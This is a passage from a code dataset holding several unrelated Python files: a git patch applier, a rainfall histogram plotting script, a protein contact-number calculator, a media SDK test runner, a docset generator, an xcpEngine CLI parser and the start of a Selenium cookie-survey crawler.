        ('0003-Start-iOS-simulator-before-running-tests.patch', TESTING_PATH),
        ('0004-Remove-webrtc_overrides.patch', THIRD_PARTY_PATH),
        ('0005-Fixed-compile-issue-and-disable-thin-archive.patch', BUILD_PATH),
        ('0009-Fix-compile-issue-for-linux-g-build.patch', BUILD_PATH),
        ('0006-Adjusted-jni_generator.py-to-fit-OWT-code-structure.patch', BASE_PATH),
        # '0008-ios-Various-build-fixes-for-Xcode-10.patch' (BUILD_PATH) is
        # intentionally disabled, mirroring the commented-out original.
    ]
    for patch_name, repo_path in patches:
        patch_file = os.path.join(PATCH_PATH, patch_name)
        if (subprocess.call(['git', 'am', patch_file], shell=useShell, cwd=repo_path)) != 0:
            subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=repo_path)
def main(argv):
    """Entry point: apply all patches and report success to the caller."""
    del argv  # unused; kept for the conventional main(argv) signature
    _patch()
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))
9681690 | <filename>_codes/_figurecodes/fig5_RainfallHistograms_CDFs.py
#/!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Figure 5 from Adams et al., "The competition between frequent and rare flood events:
impacts on erosion rates and landscape form"
Written by <NAME>
Updated April 14, 2020
"""
from landlab.io import read_esri_ascii, write_esri_ascii
from landlab.components import OverlandFlow, PrecipitationDistribution, DepthSlopeProductErosion, LinearDiffuser
import numpy as np
from landlab.utils.depth_dependent_roughness import depth_dependent_mannings_n
from matplotlib import pyplot as plt
from landlab.plot import imshow_grid
from scipy.stats import norm
import time
import matplotlib.pyplot as plt
plt.rcParams["font.family"] = "Helvetica"
plt.rcParams['font.size'] = 10
## Generate 1000 year precipitation time series
# total_t is expressed in hours: 1000 years * 365.25 days/yr * 24 hr/day.
total_t = 1000.*365.25*24
# Poisson rectangular-pulse rainfall generators. Parameter pairs set the
# rainfall variability (Rvar); intensities are mm/hr and depths mm (per the
# axis labels used in the panels below).
lowRvar_PrecipDist = PrecipitationDistribution(mean_storm_duration = 11.75,
                                               mean_interstorm_duration = 146.25,
                                               mean_storm_depth = 4.775,
                                               total_t=total_t)
highRvar_PrecipDist = PrecipitationDistribution(mean_storm_duration = 10.75,
                                                mean_interstorm_duration = 433.58,
                                                mean_storm_depth = 9.62,
                                                total_t=total_t)
# Intensity threshold: storms with intensity <= thresh are excluded from the
# "sampled" series (the *_raw arrays below keep every storm).
thresh = 0.5
# Get actual time series for the high Rvar case.
# Each storm-array row is (start time, end time, intensity) -- durations are
# computed as column 1 minus column 0 and the threshold is applied to column 2.
highRvar_storm_arr = np.array(highRvar_PrecipDist.get_storm_time_series())
highRvar_intensity_threshold, = np.where(highRvar_storm_arr[:, 2] > thresh)
highRvar_durations = highRvar_storm_arr[highRvar_intensity_threshold][:, 1] - highRvar_storm_arr[highRvar_intensity_threshold][:, 0]
highRvar_durations_s = [x * 3600. for x in highRvar_durations]  # hours -> seconds
highRvar_intensities = highRvar_storm_arr[highRvar_intensity_threshold][:, 2]
highRvar_depth = highRvar_durations * highRvar_intensities
highRvar_durations_raw = highRvar_storm_arr[:, 1] - highRvar_storm_arr[:, 0]
highRvar_intensities_raw = highRvar_storm_arr[:, 2]
highRvar_depth_raw = highRvar_durations_raw * highRvar_intensities_raw
# Get actual time series for the low Rvar case (same processing as above).
lowRvar_storm_arr = np.array(lowRvar_PrecipDist.get_storm_time_series())
lowRvar_intensity_threshold, = np.where(lowRvar_storm_arr[:, 2] > thresh)
lowRvar_durations = lowRvar_storm_arr[lowRvar_intensity_threshold][:, 1] - lowRvar_storm_arr[lowRvar_intensity_threshold][:, 0]
lowRvar_durations_s = [x * 3600. for x in lowRvar_durations]
lowRvar_intensities = lowRvar_storm_arr[lowRvar_intensity_threshold][:, 2]
lowRvar_depth = lowRvar_durations * lowRvar_intensities
lowRvar_durations_raw = lowRvar_storm_arr[:, 1] - lowRvar_storm_arr[:, 0]
lowRvar_intensities_raw = lowRvar_storm_arr[:, 2]
lowRvar_depth_raw = lowRvar_durations_raw * lowRvar_intensities_raw
## Histogram weighting
# Uniform 1/N weights so each histogram's bars sum to a total probability of 1.
highRvar_raw_weights = np.ones_like(highRvar_intensities_raw)/float(len(highRvar_intensities_raw))
highRvar_weights = np.ones_like(highRvar_intensities)/float(len(highRvar_intensities))
lowRvar_raw_weights = np.ones_like(lowRvar_intensities_raw)/float(len(lowRvar_intensities_raw))
lowRvar_weights = np.ones_like(lowRvar_intensities)/float(len(lowRvar_intensities))
dhighRvar_raw_weights = np.ones_like(highRvar_depth_raw)/float(len(highRvar_depth_raw))
dhighRvar_weights = np.ones_like(highRvar_depth)/float(len(highRvar_depth))
dlowRvar_raw_weights = np.ones_like(lowRvar_depth_raw)/float(len(lowRvar_depth_raw))
dlowRvar_weights = np.ones_like(lowRvar_depth)/float(len(lowRvar_depth))
## CDF creation
# Normal CDFs fitted to each sampled series (mean/std estimated from the data).
# NOTE(review): these CDF arrays are not plotted in the panels below --
# presumably retained for other analyses; confirm before removing.
lowRvar_dur_cdf = norm.cdf(lowRvar_durations, np.average(lowRvar_durations), np.std(lowRvar_durations))
highRvar_dur_cdf = norm.cdf(highRvar_durations, np.average(highRvar_durations), np.std(highRvar_durations))
lowRvar_depth_cdf = norm.cdf(lowRvar_depth, np.average(lowRvar_depth), np.std(lowRvar_depth))
highRvar_depth_cdf = norm.cdf(highRvar_depth, np.average(highRvar_depth), np.std(highRvar_depth))
lowRvar_int_cdf = norm.cdf(lowRvar_intensities, np.average(lowRvar_intensities), np.std(lowRvar_intensities))
highRvar_int_cdf = norm.cdf(highRvar_intensities, np.average(highRvar_intensities), np.std(highRvar_intensities))
plt.figure("Panel A")
int_bins = np.arange(0, 5, 0.1)
ax = plt.gca()
plt.title('Comparison sampled high/low $R_{var}$ intensity probabilities')
plt.hist(highRvar_intensities, int_bins, color='saddlebrown', label='Sampled high $R_{var}$ Data', weights =highRvar_weights, histtype='step',linewidth=1.5)#alpha=0.4)# histtype='step')
plt.hist(lowRvar_intensities, int_bins, color='teal', label='Sampled low $R_{var}$ Data', histtype='step',weights=lowRvar_weights,linewidth=1.5)
plt.legend()
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
plt.xlabel('Intensity (mm/hr)')
plt.ylabel('Probability')
plt.ylim(0, 0.3)
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
ax.set_xticks(np.arange(0, 5, 1))
plt.xlim(0, 4)
plt.show()
inds_i = highRvar_intensities.argsort()
inds_bi = lowRvar_intensities.argsort()
plt.figure("Panel B")
ax = plt.gca()
plt.loglog(np.sort(highRvar_intensities),norm.pdf(highRvar_intensities, scale=np.average(highRvar_intensities))[inds_i],'-' ,label='Sampled high R$_{var}$', color='saddlebrown')
plt.loglog(np.sort(lowRvar_intensities), norm.pdf(lowRvar_intensities, scale=np.average(lowRvar_intensities))[inds_bi], label='Sampled low R$_{var}$', color='teal')
plt.legend()
plt.ylim(10**-3, 10**-0)
plt.xlim(5*(10**-1), 10**1)
plt.xlabel('Rainfall intensity for an event (mm hr$^{-1}$)')
plt.ylabel('Relative frequency')
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
plt.show()
depth_bins = np.arange(0, 100, 2)
plt.figure("Panel C")
ax = plt.gca()
plt.title('Comparison sampled high/low $R_{var}$ depth probabilities')
plt.hist(highRvar_depth, depth_bins, color='saddlebrown', label='Sampled high $R_{var}$ Data',weights=dhighRvar_weights, histtype='step', linewidth=1.5)# alpha=0.4)
plt.hist(lowRvar_depth, depth_bins, color='teal', label='Sampled low $R_{var}$ Data', weights=dlowRvar_weights, histtype='step', linewidth=1.5)
plt.legend()
plt.xlabel('Depth (mm)')
plt.ylabel('Probability')
plt.ylim(0, 0.3)
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
ax.set_xticks(np.arange(0, 90, 15))
plt.xlim(0, 60)
plt.show()
inds = highRvar_depth.argsort()
inds_b = lowRvar_depth.argsort()
plt.figure("Panel D")
ax = plt.gca()
plt.loglog(np.sort(highRvar_depth),norm.pdf(highRvar_depth, scale=np.average(highRvar_depth))[inds],'-' ,label='Sampled high R$_{var}$', color='saddlebrown')
plt.loglog(np.sort(lowRvar_depth), norm.pdf(lowRvar_depth, scale=np.average(lowRvar_depth))[inds_b], label='Sampled low R$_{var}$', color='teal')
plt.legend()
plt.ylim(10**-6, 10**-1)
plt.xlim(10**0, 10**2)
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
plt.xlabel('Rainfall depth for an event (mm)')
plt.ylabel('Relative frequency')
plt.show()
| StarcoderdataPython |
11288806 | #!/usr/bin/python
'''
This script parses an input PDB file and returns weighted contact number (WCN)
values, calculated with respect to the alpha-carbon (wcn_ca) and the sidechain
geometric center (wcn_sc).
Author: <NAME>
'''
import os
import csv
import warnings
import argparse
import textwrap
from Bio.Data import SCOPData
from Bio.PDB import PDBParser
from Bio.PDB import is_aa
def inv_sq_distance(coord1, coord2):
    '''
    Returns the inverse squared distance between any two coordinates.
    Coordinates are iterated pairwise, so any equal-length sequences work.
    '''
    squared_distance = sum((a - b) ** 2 for a, b in zip(coord1, coord2))
    return 1 / squared_distance
def calculate_wcn(residues):
    '''
    Calculates weighted contact number (WCN) for every residue, in place.

    WCN for a residue is the sum of inverse squared distances to all other
    residues, computed both for the alpha-carbon ('wcn_ca') and for the
    sidechain geometric center ('wcn_sc').

    Each symmetric pair is now visited once and its contribution added to
    both residues (the previous version recomputed every pair twice, and
    its `residue != other_residue` dict-equality test could wrongly skip
    two distinct residues that happened to hold identical values).
    '''
    # Initialize accumulators first so the pairwise pass can add to both
    # members of each pair.
    for residue in residues:
        residue['wcn_ca'] = 0.0
        residue['wcn_sc'] = 0.0
    for i, residue in enumerate(residues):
        for other_residue in residues[i + 1:]:
            # One distance evaluation per unordered pair.
            contribution_ca = inv_sq_distance(residue['coord_ca'],
                                              other_residue['coord_ca'])
            contribution_sc = inv_sq_distance(residue['sidechain_center'],
                                              other_residue['sidechain_center'])
            residue['wcn_ca'] += contribution_ca
            other_residue['wcn_ca'] += contribution_ca
            residue['wcn_sc'] += contribution_sc
            other_residue['wcn_sc'] += contribution_sc
    return residues
def process_residue(residue):
    '''
    Processes a single Biopython residue to determine the coordinates of the
    alpha-carbon and the sidechain geometric center. Also checks for missing
    atoms in a residue.

    Returns a dict with keys: 'pdb_aa' (one-letter code), 'pdb_position'
    (residue number plus any insertion code), 'chain', 'coord_ca', and
    'sidechain_center'.

    Raises RuntimeError when the alpha-carbon is missing (WCN cannot be
    computed without it); missing mainchain atoms or a missing sidechain
    only trigger RuntimeWarning.
    '''
    output_dict = {}
    atoms_seen = []
    # Convert three letter amino acid to one letter
    output_dict['pdb_aa'] = SCOPData.protein_letters_3to1[residue.resname]
    # Grab residue number AND any insertion site labeling (11A, 11B, etc.)
    output_dict['pdb_position'] = str(residue.get_id()[1]) + \
        residue.get_id()[2].strip()
    output_dict['chain'] = residue.get_full_id()[2]
    # Coordinates of all sidechain atoms in this residue
    sidechain_coords = []
    for atom in residue:
        atoms_seen.append(atom.name)
        if atom.name == 'CA':
            # Save alpha-carbon coordinates
            output_dict['coord_ca'] = atom.get_coord()
        if atom.name not in ['C', 'CA', 'O', 'N']:
            # Must be a sidechain atom...
            sidechain_coords.append(atom.get_coord())
    # Template reused for every warning/error about this residue.
    warning_message = "Missing {} in residue (" + \
        str(output_dict['pdb_position']) + ", " + \
        str(output_dict['pdb_aa']) + ")"
    for mainchain_atom in ['N', 'C', 'O']:
        # Warn about any missing mainchain atoms
        if mainchain_atom not in atoms_seen:
            warnings.warn(warning_message.format(mainchain_atom),
                          RuntimeWarning)
    if 'coord_ca' not in output_dict:
        # Cannot calculate WCN without at least alpha-carbon
        raise RuntimeError(warning_message.format('CA') +
                           '. Cannot calculate C-alpha WCN.')
    if len(sidechain_coords) == 0:
        # Warn about missing sidechain for amino acids other than glycine
        # (glycine genuinely has no sidechain, so no warning for 'G').
        if output_dict['pdb_aa'] != 'G':
            warnings.warn(warning_message.format('sidechain') +
                          '. Using CA instead.', RuntimeWarning)
        sidechain_coords.append(output_dict['coord_ca'])
    # Calculate side chain center of mass (unweighted mean of atom coords)
    output_dict['sidechain_center'] = sum(sidechain_coords) / \
        len(sidechain_coords)
    return output_dict
def collect_coordinates(structure):
    '''
    Loops over all residues in a structure and collects coordinates for alpha-
    carbons and sidechain center-of-mass. Returns a list of dictionaries, where
    each dictionary corresponds to one amino-acid residue in the structure.
    '''
    return [process_residue(residue)
            for residue in structure.get_residues()
            if is_aa(residue)]
def main():
    '''
    Parse an input PDB file and write a CSV with weighted contact number
    values (one row per residue; see the argparse epilog for columns).
    '''
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description='Calculate WCN values for an input PDB.',
        epilog=textwrap.dedent('''\
            This script produces a CSV with the following columns:
            Column name     Description
            ===================================================================
            pdb_position    Residue number, extracted from the input PDB file.
            chain           PDB chain.
            pdb_aa          Single-letter amino acid.
            wcn_sc          Weighted contact number calculated with respect to
                            the amino acid side-chain center-of-mass.
            wcn_ca          Weighted contact number calculated with respect to the
                            amino acid alpha carbon.
            ''') )
    parser.add_argument('pdb', metavar='<PDB path>', type=str,
                        help='input pdb file')
    parser.add_argument('-o', metavar='<output prefix>', type=str,
                        help='prefix for output files')
    args = parser.parse_args()
    pdb_name = os.path.splitext(os.path.basename(args.pdb))[0]
    # Define output file names
    if args.o is None:
        # If no output prefix given, assign prefix using input filename
        args.o = pdb_name
    output_wcn = args.o + '.wcn.csv'
    # Load in PDB with BioPython
    pdb_parser = PDBParser()
    structure = pdb_parser.get_structure(pdb_name.upper(), args.pdb)
    # Collect coordinate information
    output_list = collect_coordinates(structure)
    # Calculate WCN from coordinates
    output_list = calculate_wcn(output_list)
    # Write output to a CSV (extrasaction="ignore" drops the coordinate
    # fields that are present in each residue dict but not exported)
    with open(output_wcn, 'w') as csvfile:
        writer = csv.DictWriter(csvfile,
                                fieldnames=['pdb_position', 'chain',
                                            'pdb_aa', 'wcn_sc', 'wcn_ca'],
                                extrasaction="ignore")
        writer.writeheader()
        writer.writerows(output_list)

if __name__ == "__main__":
    main()
| StarcoderdataPython |
3428870 | <filename>ted/ted/run.py
# -*- coding: utf-8 -*-
# Copyright (c) 2018 Intel Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import json
import pprint
import pathlib
import hashlib
import subprocess
class EncodedFileName(object):
    """Stateful re.sub replacement callback generating sequential output
    file names of the form ``CCCC.II.out`` for one test case.

    Every call returns the next name and records it in ``self.names`` so
    callers can later collect checksums for all generated files.
    """
    def __init__(self, case_id):
        self.case_id = case_id
        self.idx = 1
        self.names = []

    def __call__(self, m):
        # The regex match object *m* is intentionally ignored; only the
        # running counter determines the generated name.
        generated = f"{self.case_id:04d}.{self.idx:02d}.out"
        self.names.append(generated)
        self.idx += 1
        return generated
def collect_md5(names, workdir, case_id):
    """Compute the MD5 digest of each named file under *workdir*.

    Returns a dict mapping file name -> hex digest, and also dumps that
    dict to ``<case_id>.json`` (zero-padded to 4 digits) in *workdir*.

    Bug fix: the md5 object is now created inside the loop. Previously a
    single hashlib.md5() instance was shared across all files, so every
    file after the first received a *cumulative* digest of all bytes seen
    so far instead of its own checksum.
    """
    results = {}
    for name in names:
        md5 = hashlib.md5()  # fresh digest per file
        with (workdir / name).open("rb") as f:
            # Stream in 4 KiB chunks to keep memory bounded for large outputs.
            for chunk in iter(lambda: f.read(4096), b""):
                md5.update(chunk)
        results[name] = md5.hexdigest()
    result = workdir / "{:04d}.json".format(case_id)
    with result.open("w") as f:
        json.dump(results, f)
    return results
class Runner(object):
    """Drives the MSDK sample binaries (decode/encode/transcode/vpp) for a
    test case: builds the command line, logs a reproducible transcript, runs
    the tool, and collects MD5 checksums of the produced output files."""

    def __init__(self, extra_env, cfg):
        # Child processes get the current environment plus any overrides.
        self.env = os.environ.copy()
        if extra_env:
            self.env.update(extra_env)
        # NOTE(review): _run() iterates self.extra_env.items() unconditionally,
        # so extra_env=None would raise AttributeError there -- confirm callers
        # always pass a dict (possibly empty).
        self.extra_env = extra_env
        self.cfg = cfg

    def _run(self, case_id, cmd, workdir, log):
        """Execute *cmd* in *workdir*, teeing stdout+stderr into *log*.

        Returns the child's exit code. A failing command is logged and its
        return code returned -- the CalledProcessError is never propagated.
        """
        log.dump_header()
        log.separator()
        # Record a copy-pasteable shell transcript: exports, cwd, command.
        for var, val in self.extra_env.items():
            log.log("export {}={}".format(var, val))
        log.log("cd {}".format(workdir.resolve()))
        # ensure all parts of command line are strings
        cmd = [str(e) for e in cmd]
        log.log(subprocess.list2cmdline(cmd))
        log.separator()
        try:
            p = subprocess.run(
                cmd,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                check=True,
                cwd=str(workdir),
                env=self.env,
                #shell=True
            )
            log.log(p.stdout.decode('utf-8'))
            log.separator()
            return p.returncode
        except subprocess.CalledProcessError as exc:
            log.log(exc.output.decode('utf-8'))
            log.separator()
            log.log("return code: {}".format(exc.returncode))
            return exc.returncode

    def other_options(self, case):
        """Translate remaining case keys into CLI flags: booleans become bare
        '-key' switches (emitted only when true); anything else becomes a
        '-key value' pair."""
        cmd = []
        # process remaining arguments
        for k, v in case.items():
            if isinstance(v, bool):
                if v:
                    cmd.append("-{}".format(k))
            else:
                cmd.extend(["-{}".format(k), v])
        return cmd

    def sample_decode(self, case_id, case, workdir, log):
        """Run sample_decode on the case's stream. On success, return the
        MD5 map for the decoded YUV output; otherwise an empty dict."""
        cmd = ['sample_decode']
        cmd.append('-hw')
        stream = case.pop("stream")
        cmd.append(stream.codec)
        cmd.extend(['-i', str(stream.path.absolute())]) #TODO: use absolute here 'higher'?
        decoded = "{:04d}.yuv".format(case_id)
        cmd.extend(['-o', decoded])
        cmd.extend(self.other_options(case))
        returncode = self._run(case_id, cmd, workdir, log)
        results = {}
        if returncode == 0:
            results = collect_md5([decoded], workdir, case_id)
            log.log(pprint.pformat(results))
        return results

    def sample_encode(self, case_id, case, workdir, log):
        """Run sample_encode. Recognized case keys (codec, stream,
        target_usage, quality, bitrate, qp) are popped and mapped to their
        dedicated flags; whatever remains goes through other_options()."""
        cmd = ['sample_encode']
        encoder = case.pop('codec')
        cmd.append(encoder.codec)
        if encoder.plugin:
            cmd.extend(['-p', encoder.plugin['guid']])
        cmd.append('-hw')
        stream = case.pop('stream')
        cmd.extend(['-i', stream.path.absolute()])
        cmd.extend(['-w', stream.width])
        cmd.extend(['-h', stream.height])
        if 'target_usage' in case:
            tu = case.pop('target_usage')
            cmd.extend(['-u', tu.usage])
        if 'quality' in case:
            quality = case.pop('quality')
            cmd.extend(['-q', quality])
        if 'bitrate' in case:
            bitrate = case.pop('bitrate')
            cmd.extend(['-b', bitrate])
        if 'qp' in case:
            # Constant-QP mode: the same QP is applied to I, P and B frames.
            qp = case.pop('qp')
            cmd.extend(['-cqp', '-qpi', qp, '-qpp', qp, '-qpb', qp])
        cmd.extend(self.other_options(case))
        encoded = "{:04d}.{}".format(case_id, encoder.codec)
        cmd.extend(['-o', encoded])
        returncode = self._run(case_id, cmd, workdir, log)
        results = {}
        if returncode == 0:
            results = collect_md5([encoded], workdir, case_id)
            log.log(pprint.pformat(results))
        return results

    def sample_multi_transcode(self, case_id, case, workdir, log):
        """Run sample_multi_transcode from a parfile template: every '{out}'
        placeholder is replaced by a sequentially numbered output name, and
        MD5s are collected for all generated outputs on success."""
        cmd = ['sample_multi_transcode']
        parfile = case.pop('parfile')
        encoded_fn = EncodedFileName(case_id)
        text = re.sub(r'\{out\}', encoded_fn, parfile.text)
        parfile = workdir / '{:04d}.par'.format(case_id)
        parfile.write_text(text)
        cmd.extend(['-par', parfile.name])
        returncode = self._run(case_id, cmd, workdir, log)
        results = {}
        if returncode == 0:
            results = collect_md5(encoded_fn.names, workdir, case_id)
            log.log(pprint.pformat(results))
        return results

    def sample_vpp(self, case_id, case, workdir, log):
        """Run sample_vpp on the case's raw stream; extra case keys become
        flags via other_options(). Returns the MD5 map on success."""
        cmd = ['sample_vpp']
        cmd.extend(['-lib', 'hw'])
        stream = case.pop('stream')
        cmd.extend(['-i', stream.path.absolute()])
        cmd.extend(['-sw', stream.width])
        cmd.extend(['-sh', stream.height])
        cmd.extend(self.other_options(case))
        processed = "{:04d}.vpp".format(case_id)
        cmd.extend(['-o', processed])
        returncode = self._run(case_id, cmd, workdir, log)
        results = {}
        if returncode == 0:
            results = collect_md5([processed], workdir, case_id)
            log.log(pprint.pformat(results))
        return results
| StarcoderdataPython |
5176517 | <reponame>cblair/docset_from_html
#!/usr/bin/env python3
import os
import sys
import shutil
from get_plist_text import get_plist_text
import sqlite3
import re
import lxml
import json
from pyquery import PyQuery as pq
class docset_from_html:
    """Build a Dash/Zeal-style docset from a directory of HTML documentation.

    The selection config (JSON) maps CSS selector strings to entry settings
    ('entry_type', optional 'text_sub_element') used to populate the docset
    search index.
    """
    def __init__(self, docset_name, html_src_dir, config_filename):
        self.docset_name = docset_name
        self.html_src_dir = html_src_dir
        # NOTE(review): the handle stays open for the object's lifetime and is
        # only closed in __del__; it could be closed right after json.loads --
        # confirm nothing else reads it.
        self.config_file = open(config_filename, 'r')
        self.config_selections = json.loads(self.config_file.read())

    def __del__(self):
        self.config_file.close()

    def __make_docset_folder(self):
        # Creates <name>.docset/Contents/Resources; raises if it already exists.
        os.makedirs(os.path.join(self.docset_name + '.docset', 'Contents',
                                 'Resources'))

    def __create_info_plist_file(self):
        # Minimal Info.plist; bundle id and name both reuse the docset name.
        with open(os.path.join(self.docset_name + '.docset', 'Contents',
                               'Info.plist'), 'w') as fp:
            fp.write(get_plist_text(cf_bundler_identifier=self.docset_name,
                                    cf_bundle_name=self.docset_name,
                                    docset_platform_family=None))

    def __create_sqlite_index(self):
        # Dash docset schema: a single searchIndex table with a uniqueness
        # constraint so duplicate entries are silently skipped on insert.
        self.conn = sqlite3.connect(
            os.path.join(self.docset_name +
                         '.docset', 'Contents', 'Resources', 'docSet.dsidx'))
        self.db_cursor = self.conn.cursor()
        self.db_cursor.execute('CREATE TABLE searchIndex ' +
            '(id INTEGER PRIMARY KEY, name TEXT, type TEXT, path TEXT);')
        self.db_cursor.execute('CREATE UNIQUE INDEX anchor ON searchIndex' +
            '(name, type, path);')

    # TODO - refactor, split out into more separate methods
    def __population_sqlite_index(self, html_dst_dir):
        fileregex = re.compile('^.*\.html')
        # For every file in the destination directory...
        for dirpath, dnames, fnames in os.walk(html_dst_dir):
            for fname in fnames:
                # If the file is not an html file, go to the next one.
                if not fileregex.match(fname):
                    continue
                # Open the file and process it
                fq_fname = os.path.join(dirpath, fname)
                with open(fq_fname) as fp:
                    try:
                        filetext = fp.read()
                    except:
                        # NOTE(review): bare except silently swallows read
                        # errors (e.g. undecodable bytes) -- the file is then
                        # indexed as empty.
                        filetext = ""
                # Get a DOM object from the text.
                try:
                    dom = pq(filetext)
                    print("Processing " + fq_fname)
                except ValueError as e:
                    print("WARN: ignoring {fname}, error: {error}".format(
                        fname=fq_fname, error=e))
                    continue
                except lxml.etree.XMLSyntaxError as e:
                    print("WARN: ignoring {fname}, error: {error}".format(
                        fname=fq_fname, error=e))
                    continue
                # Collect all the elements in the DOM we care about based
                # on the selection configuration, and craft our search index
                # data from it.
                search_index_data = []
                for key in self.config_selections.keys():
                    config_selection = self.config_selections[key]
                    # Get all the elements that match in the DOM.
                    elements = dom(key)
                    for element in elements:
                        # The optional reference to the page section, using
                        # the HTML name attribute.
                        section_reference = ""
                        # TODO: check that its an <a> element too.
                        # TODO: support HTML 5 id attribute
                        if 'name' in element.attrib.keys():
                            section_reference = "#" + element.attrib['name']
                        # Set the search text to the element's text, or
                        # what the config wants it set to.
                        element_text = element.text
                        if 'text_sub_element' in config_selection.keys():
                            sub_element = element.find(
                                config_selection['text_sub_element'])
                            element_text = sub_element.text if \
                                sub_element != None else ""
                        search_index_data.append(
                            [
                                # name
                                element_text,
                                # type
                                config_selection['entry_type'],
                                #path
                                # TODO: need to add # name reference so
                                # clicking on the index will go to the
                                # page section (if html name attr is
                                # set). User element.attrib.
                                # (path is stored relative to the docset's
                                # Documents dir)
                                os.path.join(dirpath, fname).replace(
                                    html_dst_dir + os.sep, ''
                                ) + section_reference
                            ]
                        )
                self.db_cursor.executemany(
                    'INSERT OR IGNORE INTO searchIndex' +
                    '(name, type, path) VALUES (?,?,?)',
                    search_index_data)
                self.conn.commit()

    def run(self):
        """Execute the full docset build pipeline end to end."""
        html_dst_dir = os.path.join(
            self.docset_name + '.docset', 'Contents', 'Resources', 'Documents')
        # 1. Create the Docset Folder
        self.__make_docset_folder()
        # 2. Copy the HTML Documents
        shutil.copytree(self.html_src_dir, html_dst_dir)
        # 3. Create the Info.plist File
        self.__create_info_plist_file()
        # 4. Create the SQLite Index
        self.__create_sqlite_index()
        # 5. Populate the SQLite Index
        self.__population_sqlite_index(html_dst_dir)
        # 6. Table of Contents Support (optional)
        # TODO
        # Cleanup
        self.conn.close()
if __name__ == "__main__":
    # Simple cheesy options handling.
    # Expects exactly three positional arguments (plus the script name).
    if len(sys.argv) != 4:
        print(
            'Usage: docset_from_html.py <docset name> ' +
            '<source html directory> <selection config file>')
        sys.exit(1)
    dfh = docset_from_html(sys.argv[1], sys.argv[2], sys.argv[3])
    dfh.run()
| StarcoderdataPython |
11328567 | <reponame>dhasegan/xcpEngine
import os
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
def get_parser():
    """Defines the command line interface of the wrapper.

    Returns an argparse.ArgumentParser with a mandatory group (-d design
    file, -c cohort file, -o output dir) and optional arguments (-m, -i,
    -r, -t, --help). Built with add_help=False plus a manual --help flag,
    so the caller decides how help is rendered.
    """
    parser = ArgumentParser(
        description='xcpEngine: the extensible connectome pipeline',
        formatter_class=RawTextHelpFormatter,
        prog="xcpEngine",
        add_help=False
    )
    # Standard xcpEngine arguments
    mandatory_group = parser.add_argument_group('Mandatory options')
    # -d is normalized to an absolute path at parse time.
    mandatory_group.add_argument(
        '-d',
        type=os.path.abspath,
        required=True,
        action='store',
        help="Primary design file for pipeline: "
             "The design file specifies the pipeline modules to "
             "be included in the current analysis and configures "
             "any parameters necessary to run the modules.")
    mandatory_group.add_argument(
        '-c',
        required=True,
        action='store',
        help="Cohort file for pipeline input: "
             "A comma-separated catalogue of the analytic sample. "
             "Each row corresponds to a subject, and each column "
             "corresponds either to an identifier or to an input.")
    mandatory_group.add_argument(
        '-o',
        required=True,
        action='store',
        help="Parent directory for pipeline output: "
             "A valid path on the current filesystem specifying "
             "the directory wherein all output from the current "
             "analysis will be written.")
    optional_group = parser.add_argument_group('Optional Arguments')
    optional_group.add_argument(
        '-m',
        choices=["s", "c"],
        action='store',
        help="Execution mode: "
             "Input can either be 's' (for serial execution on a "
             "single machine)[default], 'c' (for execution on a "
             "computing cluster) or a path to a file (for execution "
             "on a computing cluster, subject to the specifications "
             "defined in the file).")
    optional_group.add_argument(
        '-i',
        action='store',
        help=": Scratch space for pipeline intermediates: "
             "Some systems operate more quickly when temporary "
             "files are written in a dedicated scratch space. This "
             "argument enables a scratch space for intermediates.")
    optional_group.add_argument(
        '-r',
        action='store',
        help="Root directory for inputs: "
             "If all paths defined in the cohort file are defined "
             "relative to a root directory, then this argument will "
             "define the root directory. Otherwise, all paths will "
             "be treated as absolute.")
    optional_group.add_argument(
        '-t',
        action='store',
        choices=["0", "1", "2", "3"],
        help="Integer value ( 0 - 3 ) that indicates the level "
             "of verbosity during module execution. Higher "
             "levels reduce readability but provide useful "
             "information for troubleshooting.")
    # Manual help flag (add_help=False above suppresses the automatic -h).
    optional_group.add_argument(
        "--help",
        action="store_true"
    )
    return parser
| StarcoderdataPython |
6560583 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""This module uses selenium automation to visit a list of sites loaded
from configuration and either accept or reject cookies retrieving the
cookies created during the visit and creating statistics around them.
It also screenshots the site and some of its important elements
regarding cookies."""
import csv
import logging
import os
import platform
import sqlite3
import sys
from collections import Counter
from shutil import rmtree
from time import sleep
from urllib.parse import urlparse
import arrow
import yaml
from selenium.common.exceptions import (ElementClickInterceptedException,
NoSuchElementException,
TimeoutException)
from selenium.webdriver import Chrome, ChromeOptions
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
# from PIL import Image
# Paths are resolved relative to this script's location on disk.
CWD = os.path.dirname(__file__)
DATA_PATH = os.path.join(CWD, "data")  # NOTE(review): not referenced in this module
CONFIG_PATH = os.path.join(CWD, "config")
# Dedicated Chrome user-data dir; wiped before every run for a clean profile.
PROFILE_PATH = os.path.abspath(os.path.join(CWD, "profile"))
# Column order for the per-cookie CSV export (mirrors Chrome's cookies table).
HEADER_COOKIES = [
    "host_key",
    "name",
    "value",
